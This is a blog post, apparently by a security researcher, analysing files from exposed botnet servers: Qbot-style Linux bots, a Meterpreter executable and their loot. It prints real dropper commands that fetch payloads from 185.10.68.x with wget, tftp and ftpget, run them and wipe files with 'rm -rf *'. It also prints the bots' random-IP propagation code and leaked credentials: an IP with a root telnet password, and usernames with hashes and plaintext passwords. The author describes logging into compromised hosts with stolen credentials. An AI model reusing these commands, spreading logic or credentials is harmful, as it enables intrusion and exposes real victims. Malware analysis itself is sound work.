![\"\"](\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2019\/01\/browse.png\")
<\/a>So obviously I have to wget that shit as soon as possible right? Can’t have it going offline before I’m done with it…
![\"\"](\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2019\/01\/wget.png\")
<\/a><\/p>\n<\/p>\n\n\n
I have something like 191 thousand username \/ password \/ ip \/ port combinations. Sure some of them are offline, but most are still there. Pretty big botnet. This was the contents of the ‘infected.txt’ file.<\/p>\n\n\n\n
Remember telnet? I do. Some of them work, some don’t. I don’t care enough to ping each one for connectivity, but I got a few dozen to work just fine…<\/p>\n\n\n\n Each binary seems to follow the same pattern – randomly try a new host to infect, much like a virus and move on. <\/p>\n\n\n\n What about the bots? Whoever made this had a goal in mind – infected all the Linuxes!<\/p>\n\n\n\n \nWhat\u2019s inside the bots?<\/p>\n\n\n\n The strings make it obvious what it\u2019s doing…<\/p>\n\n\n\n First we have our command string… cd \/tmp || cd \/var\/run || cd \/mnt || cd \/root || cd \/; wget http:\/\/185.10.68.125\/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 185.10.68.125 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.10.68.125; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.10.68.125 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit Tl;dr – grab some bash files, throw them in various places, chmod them, run them, delete them. Here\u2019s the contents of one of the shell scripts… -e #!\/bin\/bash<\/p>\n\n\n\n -e cd \/tmp || cd \/var\/run || cd \/mnt || cd \/root || cd \/; wget http:\/\/185.10.68.125\/ntpd; chmod +x ntpd; .\/ntpd; rm -rf ntpd<\/p>\n\n\n\n -e cd \/tmp || cd \/var\/run || cd \/mnt || cd \/root || cd \/; wget http:\/\/185.10.68.125\/sh; chmod +x sh; .\/sh; rm -rf sh<\/p>\n\n\n\n -e cd \/tmp || cd \/var\/run || cd \/mnt || cd \/root || cd \/; wget http:\/\/185.10.68.125\/’ ‘; chmod +x ‘ ‘; .\/’ ‘; rm -rf ‘ ‘<\/p>\n\n\n\n ^^^ I highlighted the most interesting one. The apache index doesn\u2019t support directly spaces for file names, as a result, the browser won\u2019t be able to browse to it directly. Bug or feature?<\/p>\n\n\n\n So replace common programs with zombie progs? Just does a random number 0-255 on each of the 4 octets. Of course it seems to skip the private network ranges.<\/p> Hope you like C: A quick cursory search on github with a few names of the functions (like \u2018StartTheLelz\u2019) I saw quickly gave me source code. Qbot. <\/p>\n\n\n\n https:\/\/github.com\/AgentCri\/CnC\/blob\/ecacec9cfe9874cfa6c54cfed239faa29ab75bac\/Clients\/(QBOT)%20Unix%20Client.c<\/a><\/p>\n\n\n\n I wasn\u2019t expecting some complex shit on a PUBLICLY EXPOSED IP address. <\/p>\n\n\n\n The github link posted does a better job explaining the rest of the functionality. Check passwords, connect, spread, flood UPD, TCP, etc. <\/p>\n\n\n\n Wrap up of first botnet host <\/strong>: The user\/passes in these files\ndon\u2019t add up – the passwords inside don\u2019t match what\u2019s in the bot. Exmaple:\n104.206.241.222:23 root:t0talc0ntr0l4!<\/p>\n\n\n\n Most of these accounts aren\u2019t root shells either, but are you really that picky?<\/p>\n\n\n\n Second botnet host<\/strong><\/p>\n\n\n\n Rather innocuous, just a lone exe. What could it be?<\/p>\n\n\n\n Like all suspected windows executables on the net, it\u2019s packed, because of course it is. Before you ask how I know, you can just tell looking at strings and the lack of exported \/ import functions.<\/p>\n\n\n\n Unpacking this was trivial. This might be the dunning-kruger effect, but this was pretty easy for me. Just located the VirtualAlloc call that was setting the protection type to \u2018execute\u2019 that loaded the encrypted strings I saw earlier.<\/p>\n\n\n\n Break on run, locate buffer, save. <\/p>\n\n\n\n So what the fuck is it? Meterpreter shell. How did I come up with this? Again, look at the function names (why don\u2019t people strip these?) and browse github.<\/p>\n\n\n\n The fFunction named \u2018packet_call_completion_handlers\u2019 stands out. I found it on github under meterpreter’s source code:<\/p>\n\n\n\n Wrapping up Bot 2 <\/strong><\/p>\n\n\n\n Just a meterpreter exe. Likely a staging point for metasploit. <\/p>\n\n\n\n Bot 3 – The other Linux one<\/strong>.<\/p>\n\n\n\n This one has a much larger haul of users \/ passwords than the last one. Way more binaries too.<\/p>\n\n\n\n What do we have this time? More Complex than #1 <\/p>\n\n\n\n More passwords, more users, more architectures.<\/p>\n\n\n\n This one operates the same way as the previous one, just has more users and passwords. <\/p>\n\n\n\n The command string pulled from the binaries is like the first one:<\/p>\n\n\n\n Grab a binary, chmod it, run it, delete it. <\/p>\n\n\n\n I know what you’re thinking: “Joe, what’s in the PCAP files?” <\/p>\n\n\n\n Nothing. All lame shit. Disappointing.<\/p>\n\n\n\n What about the JSON files? What’s in those?<\/p>\n\n\n\n The big huge one \u2018servers.json\u2019\ncontains the following:<\/p>\n\n\n\n ,.{ “ip”:\n“184.95.45.22”, \n“timestamp”: “1537106844”, “ports”: [\n{“port”: 63922, “proto”: “tcp”,\n“status”: “open”, “reason”: “syn-ack”,\n“ttl”: 52} ] }.,.{ \n“ip”: “108.170.33.182”, “timestamp”:\n“1537106844”, “ports”: [ {“port”: 38445,\n“proto”: “tcp”, “status”: “open”,\n“reason”: “syn-ack”, “ttl”: 52} ] }.,.{ “ip”:\n“184.95.45.22”, \n“timestamp”: “1537106845”, “ports”: [\n{“port”: 24884, “proto”: “tcp”,\n“status”: “open”, “reason”: “syn-ack”,\n“ttl”: 52} ] }.<\/p>\n\n\n\n Ports, IP\u2019s, timestamps. Hundreds of thousands of entries. <\/p>\n\n\n\n Visit one of the IP’s and they all seem to be the same thing: NGINX. Maybe its some sort of 0day?<\/p>\n\n\n\n What about the other JSON file? <\/p>\n\n\n\n Usernames, passwords and hashes!<\/p>\n\n\n\n “14673”:{“username”:”Deadmau5_5_”,”hash”:”$1$9M4L+1Df$cGT1IOC58njMFfJZUBPbM0″,”password”:”general23″},”14674″:{“username”:”leelucky2″,”hash”:”$1$9M4L+1Df$cGT1IOC58njMFfJZUBPbM0″,”password”:”general23″}<\/p>\n\n\n\n This file is HUGE. Shitloads of hashes, usernames, passwords. <\/p>\n\n\n\n What about source code? Did you get that too? You betcha!<\/p>\n\n\n\n<\/figure>\n\n\n\n
There are a number of bot clients in various architectures ranging from :<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
Yes. After this is done, the next piece of code it runs replication. The process is simple – find a random IP, try the list of users and passwords from before, then attempt to connect \/ auth. How does it find a random IP programmatically?<\/p>\n\n\n\nin_addr_t<\/span> getRandomPublicIP<\/span>() { if<\/span>(ipState[1<\/span>] <<\/span> 255<\/span> &&<\/span> ipState[2<\/span>] <<\/span> 255<\/span> &&<\/span> ipState[3<\/span>] <<\/span> 255<\/span> &&<\/span> ipState[4<\/span>] <<\/span> 255<\/span>) { ipState[1<\/span>]++<\/span>; ipState[2<\/span>]++<\/span>; ipState[3<\/span>]++<\/span>; ipState[4<\/span>]++<\/span>; char<\/span> ip[16<\/span>]; szprintf(ip, \"%d.%d.%d.%d\"<\/span>, ipState[1<\/span>], ipState[2<\/span>], ipState[3<\/span>], ipState[4<\/span>]); return<\/span> inet_addr(ip); } ipState[1<\/span>] =<\/span> rand() %<\/span> 255<\/span>; ipState[2<\/span>] =<\/span> rand() %<\/span> 255<\/span>; ipState[3<\/span>] =<\/span> rand() %<\/span> 255<\/span>; ipState[4<\/span>] =<\/span> rand() %<\/span> 255<\/span>; while<\/span>( (ipState[1<\/span>] ==<\/span> 0<\/span>) ||<\/span> (ipState[1<\/span>] ==<\/span> 10<\/span>) ||<\/span> (ipState[1<\/span>] ==<\/span> 100<\/span> &&<\/span> (ipState[2<\/span>] >=<\/span> 64<\/span> &&<\/span> ipState[2<\/span>] <=<\/span> 127<\/span>)) ||<\/span> (ipState[1<\/span>] ==<\/span> 127<\/span>) ||<\/span> (ipState[1<\/span>] ==<\/span> 169<\/span> &&<\/span> ipState[2<\/span>] ==<\/span> 254<\/span>) ||<\/span> (ipState[1<\/span>] ==<\/span> 172<\/span> &&<\/span> (ipState[2<\/span>] <=<\/span> 16<\/span> &&<\/span> ipState[2<\/span>] <=<\/span> 31<\/span>)) ||<\/span> (ipState[1<\/span>] ==<\/span> 192<\/span> &&<\/span> ipState[2<\/span>] ==<\/span> 0<\/span> &&<\/span> ipState[3<\/span>] ==<\/span> 2<\/span>) ||<\/span> (ipState[1<\/span>] ==<\/span> 192<\/span> &&<\/span> ipState[2<\/span>] ==<\/span> 88<\/span> &&<\/span> ipState[3<\/span>] ==<\/span> 99<\/span>) ||<\/span> (ipState[1<\/span>] ==<\/span> 192<\/span> &&<\/span> ipState[2<\/span>] ==<\/span> 168<\/span>) ||<\/span> (ipState[1<\/span>] ==<\/span> 198<\/span> &&<\/span> (ipState[2<\/span>] ==<\/span> 18<\/span> ||<\/span> ipState[2<\/span>] ==<\/span> 19<\/span>)) ||<\/span> (ipState[1<\/span>] ==<\/span> 198<\/span> &&<\/span> ipState[2<\/span>] ==<\/span> 51<\/span> &&<\/span> ipState[3<\/span>] ==<\/span> 100<\/span>) ||<\/span> (ipState[1<\/span>] ==<\/span> 203<\/span> &&<\/span> ipState[2<\/span>] ==<\/span> 0<\/span> &&<\/span> ipState[3<\/span>] ==<\/span> 113<\/span>) ||<\/span> (ipState[1<\/span>] >=<\/span> 224<\/span>) ) { ipState[1<\/span>] =<\/span> rand() %<\/span> 255<\/span>; ipState[2<\/span>] =<\/span> rand() %<\/span> 255<\/span>; ipState[3<\/span>] =<\/span> rand() %<\/span> 255<\/span>; ipState[4<\/span>] =<\/span> rand() %<\/span> 255<\/span>; } char<\/span> ip[16<\/span>]; szprintf(ip, \"%d.%d.%d.%d\"<\/span>, ipState[1<\/span>], ipState[2<\/span>], ipState[3<\/span>], ipState[4<\/span>]); return<\/span> inet_addr(ip); } <\/pre><\/div><\/p>\n\n\n\n
<\/p>\n\n\n\n<\/figure>\n\n\n\n<\/figure>\n\n\n\n<\/figure>\n\n\n\n<\/figure>\n\n\n\n<\/figure>\n\n\n\n<\/figure>\n\n\n\n<\/figure>\n\n\n\n<\/figure>\n\n\n\n<\/figure>\n\n\n\n<\/figure>\n\n\n\n<\/figure>\n\n\n\n<\/figure>\n\n\n\nwget http:\/\/185.10.68.45\/bins\/ultronfinal.mips;chmod 777 ultronfinal.mips;.\/ultronfinal.mips;rm -rf ultronfinal.mips<\/pre>\n\n\n\n
<\/figure>\n\n\n\n<\/figure>\n\n\n\n